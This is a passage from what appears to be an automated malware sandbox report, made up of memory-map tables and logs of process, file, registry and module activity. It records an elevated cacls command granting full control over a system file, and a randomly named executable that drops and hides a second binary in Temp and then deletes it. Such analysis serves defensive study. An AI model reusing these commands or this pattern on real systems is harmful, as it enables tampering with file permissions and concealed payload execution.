| private_0x000000089a730000 | 0x89a730000 | 0x89a73ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000089a740000 | 0x89a740000 | 0x89a8c7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000089a8d0000 | 0x89a8d0000 | 0x89aa50fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000089aa60000 | 0x89aa60000 | 0x89ab5ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000089ab60000 | 0x89ab60000 | 0x89abdffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007df5ffbf0000 | 0x7df5ffbf0000 | 0x7ff5ffbeffff | Pagefile Backed Memory | - |
|
|
|
- |
| pagefile_0x00007ff706d10000 | 0x7ff706d10000 | 0x7ff706e0ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff706e10000 | 0x7ff706e10000 | 0x7ff706e32fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff706e39000 | 0x7ff706e39000 | 0x7ff706e3afff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff706e3b000 | 0x7ff706e3b000 | 0x7ff706e3bfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff706e3c000 | 0x7ff706e3c000 | 0x7ff706e3dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff706e3e000 | 0x7ff706e3e000 | 0x7ff706e3ffff | Private Memory | rw |
|
|
|
- |
| mpcmdrun.exe | 0x7ff707da0000 | 0x7ff707df6fff | Memory Mapped File | rwx |
|
|
|
- |
| mpclient.dll | 0x7ff8d6690000 | 0x7ff8d6769fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x7ff8e3a50000 | 0x7ff8e3a59fff | Memory Mapped File | rwx |
|
|
|
- |
| secur32.dll | 0x7ff8e5480000 | 0x7ff8e548bfff | Memory Mapped File | rwx |
|
|
|
- |
| cabinet.dll | 0x7ff8e5ff0000 | 0x7ff8e6016fff | Memory Mapped File | rwx |
|
|
|
- |
| gpapi.dll | 0x7ff8e9cd0000 | 0x7ff8e9cf2fff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x7ff8ea360000 | 0x7ff8ea37efff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x7ff8ea9d0000 | 0x7ff8ea9fbfff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x7ff8eadb0000 | 0x7ff8eadc0fff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x7ff8eae30000 | 0x7ff8eae42fff | Memory Mapped File | rwx |
|
|
|
- |
| wintrust.dll | 0x7ff8eae50000 | 0x7ff8eaea3fff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x7ff8eafb0000 | 0x7ff8eb170fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ff8eb870000 | 0x7ff8eba4cfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7ff8ebb30000 | 0x7ff8ebbedfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x7ff8ebdc0000 | 0x7ff8ebf0dfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ff8ec240000 | 0x7ff8ec29afff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x7ff8ec300000 | 0x7ff8ec440fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ff8ec450000 | 0x7ff8ec575fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7ff8edbc0000 | 0x7ff8edd44fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x7ff8edd60000 | 0x7ff8edfdbfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ff8ee0b0000 | 0x7ff8ee14cfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7ff8ee190000 | 0x7ff8ee235fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ff8ee2d0000 | 0x7ff8ee37cfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
Process #170: cacls.exe
0
0
| Information | Value |
|---|---|
| ID | #170 |
| File Name | c:\windows\syswow64\cacls.exe |
| Command Line | cacls "C:\Program Files\Windows Journal\en-US\JNTFiltr.dll.mui" /E /G CIiHmnxMn6Ps:F /C |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:01, Reason: Child Process |
| Unmonitor | End Time: 00:03:06, Reason: Self Terminated |
| Monitor Duration | 00:00:05 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xa88 |
| Parent PID | 0xc70 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
594
0x
E00
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000210000 | 0x00210000 | 0x0022ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000210000 | 0x00210000 | 0x0021ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000220000 | 0x00220000 | 0x00223fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000230000 | 0x00230000 | 0x00231fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000230000 | 0x00230000 | 0x00233fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000240000 | 0x00240000 | 0x00253fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000260000 | 0x00260000 | 0x0029ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002a0000 | 0x002a0000 | 0x002dffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000002e0000 | 0x002e0000 | 0x002e3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000002f0000 | 0x002f0000 | 0x002f0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000300000 | 0x00300000 | 0x00301fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000310000 | 0x00310000 | 0x0031ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000320000 | 0x00320000 | 0x0059ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00320000 | 0x003ddfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000003e0000 | 0x003e0000 | 0x0041ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000420000 | 0x00420000 | 0x0045ffff | Private Memory | rw |
|
|
|
- |
| cacls.exe.mui | 0x00460000 | 0x00461fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000004a0000 | 0x004a0000 | 0x0059ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005a0000 | 0x005a0000 | 0x0078ffff | Private Memory | rw |
|
|
|
- |
| cacls.exe | 0x00830000 | 0x00839fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000840000 | 0x00840000 | 0x0483ffff | Pagefile Backed Memory | - |
|
|
|
- |
| sortdefault.nls | 0x04840000 | 0x04b76fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x748a0000 | 0x748c7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007e3e0000 | 0x7e3e0000 | 0x7e4dffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007e4e0000 | 0x7e4e0000 | 0x7e502fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007e505000 | 0x7e505000 | 0x7e505fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e509000 | 0x7e509000 | 0x7e50bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e50c000 | 0x7e50c000 | 0x7e50efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e50f000 | 0x7e50f000 | 0x7e50ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #171: cmd.exe
54
0
| Information | Value |
|---|---|
| ID | #171 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c G13k6QZj.exe -accepteula "Music.jtp" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:02, Reason: Child Process |
| Unmonitor | End Time: 00:03:11, Reason: Self Terminated |
| Monitor Duration | 00:00:09 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xcb0 |
| Parent PID | 0x744 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
DF8
0x
608
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000890000 | 0x00890000 | 0x008affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000890000 | 0x00890000 | 0x0089ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000008a0000 | 0x008a0000 | 0x008a3fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000008b0000 | 0x008b0000 | 0x008b1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000008b0000 | 0x008b0000 | 0x008b3fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000008c0000 | 0x008c0000 | 0x008d3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000008e0000 | 0x008e0000 | 0x0091ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000920000 | 0x00920000 | 0x00923fff | Pagefile Backed Memory | r |
|
|
|
- |
| cmd.exe | 0x00930000 | 0x0097ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000980000 | 0x00980000 | 0x0497ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004980000 | 0x04980000 | 0x04a7ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004a80000 | 0x04a80000 | 0x04a80fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004a90000 | 0x04a90000 | 0x04a91fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04aa0000 | 0x04b5dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004b60000 | 0x04b60000 | 0x04b9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004c80000 | 0x04c80000 | 0x04c8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004c90000 | 0x04c90000 | 0x04eeffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004c90000 | 0x04c90000 | 0x04d8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004df0000 | 0x04df0000 | 0x04eeffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004ef0000 | 0x04ef0000 | 0x050dffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x050e0000 | 0x05416fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f290000 | 0x7f290000 | 0x7f38ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f390000 | 0x7f390000 | 0x7f3b2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f3b5000 | 0x7f3b5000 | 0x7f3b5fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f3b9000 | 0x7f3b9000 | 0x7f3bbfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f3bc000 | 0x7f3bc000 | 0x7f3bcfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f3bd000 | 0x7f3bd000 | 0x7f3bffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
2 | |
| Get Info | G13k6QZj.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
4 | |
| Open | STD_INPUT_HANDLE | - |
|
2 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 232, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\G13k6QZj.exe | os_pid = 0xa14, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x930000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x752a2780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x7527fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7527a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74f835c0 |
|
1 |
Environment (17)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
6 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #172: g13k6qzj.exe
179
0
| Information | Value |
|---|---|
| ID | #172 |
| File Name | c:\users\ciihmnxmn6ps\desktop\g13k6qzj.exe |
| Command Line | G13k6QZj.exe -accepteula -c Run -y -p extract -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:02, Reason: Child Process |
| Unmonitor | End Time: 00:03:18, Reason: Self Terminated |
| Monitor Duration | 00:00:16 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xcdc |
| Parent PID | 0x858 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
D98
0x
2D8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x002effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x001d0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001f0000 | 0x001f0000 | 0x002effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002f0000 | 0x002f0000 | 0x0032ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000350000 | 0x00350000 | 0x0035ffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x00360000 | 0x00389fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000360000 | 0x00360000 | 0x0039ffff | Private Memory | rw |
|
|
|
- |
| g13k6qzj.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| locale.nls | 0x00480000 | 0x0053dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000540000 | 0x00540000 | 0x0063ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000640000 | 0x00640000 | 0x007affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000007b0000 | 0x007b0000 | 0x00937fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000940000 | 0x00940000 | 0x00ac0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000ad0000 | 0x00ad0000 | 0x01ecffff | Pagefile Backed Memory | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74800000 | 0x74891fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x748e0000 | 0x748e7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x75160000 | 0x7521dfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x753b0000 | 0x753f3fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75400000 | 0x7542afff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75430000 | 0x767eefff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x76810000 | 0x7681efff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x76e40000 | 0x76ff9fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77000000 | 0x7714cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77150000 | 0x7728ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x77290000 | 0x772d3fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77340000 | 0x773ccfff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x773f0000 | 0x778ccfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x778d0000 | 0x779effff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x77c30000 | 0x77c3bfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ff8ee37ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (11)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\G13k6QZj64.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Get Info | C:\Users\CIIHMN~1\AppData\Local\Temp\G13k6QZj64.exe | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | C:\Users\CIIHMN~1\AppData\Local\Temp\G13k6QZj64.exe | size = 225280 |
|
1 | |
| Write | C:\Users\CIIHMN~1\AppData\Local\Temp\G13k6QZj64.exe | size = 1168 |
|
1 | |
| Delete | C:\Users\CIIHMN~1\AppData\Local\Temp\G13k6QZj64.exe | - |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\G13k6QZj64.exe | os_pid = 0x2dc, show_window = SW_HIDE |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x75260000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x76a10000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x75160000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x77000000 |
|
1 | |
| Load | USER32.dll | base_address = 0x77150000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x748e0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
